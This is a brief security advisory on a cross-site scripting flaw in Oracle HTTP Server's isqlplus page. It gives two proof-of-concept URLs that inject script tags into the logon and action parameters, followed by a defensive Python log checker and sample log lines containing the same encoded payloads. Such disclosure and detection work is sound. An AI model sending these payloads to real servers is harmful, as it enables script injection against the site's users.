Oracle HTTP Server isqlplus Cross-Site Scripting Vulnerability

The following proofs of concept were supplied:

http://<host>/isqlplus?action=logon&username=sdfds%22%3e%3cscript%3ealert('XSS')%3c/script%3e\&password=dsfsd%3cscript%3ealert('XSS')%3c/script%3e

http://<host>/isqlplus?action=<script>alert('XSS')</script>
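
A log check for the request patterns shown in the proofs of concept above, added here as an example and not part of the original advisory. It assumes access logs in Common/Combined Log Format; the function names and sample entries are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters that carry the injected markup in the two proofs of concept.
WATCHED = {"action", "username", "password"}
# After decoding, these characters have no place in a logon field or action name.
MARKUP = re.compile(r"[<>\"]")
# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253c is treated like %3c and <."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_isqlplus_xss(log_line):
    """Return the sorted watched parameters whose value contains markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.rstrip("/").lower().endswith("/isqlplus"):
        return []
    hits = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in WATCHED and MARKUP.search(fully_decode(value)):
            hits.add(name.lower())
    return sorted(hits)

# Constructed sample entries (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /isqlplus?action=logon&username=scott HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /isqlplus?action=logon&username=a%22%3e%3cscript%3e&password=b%3cscript%3e HTTP/1.1" 200 5300',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /isqlplus?action=%253cscript%253e HTTP/1.1" 200 5200',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.html?action=%3cb%3e HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(flag_isqlplus_xss(entry), entry.split('"')[1])
```

A hit means markup was sent to the endpoint, not that it was reflected; confirm against the response or the patch level of the server.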


 

Copyright 2010, SecurityFocus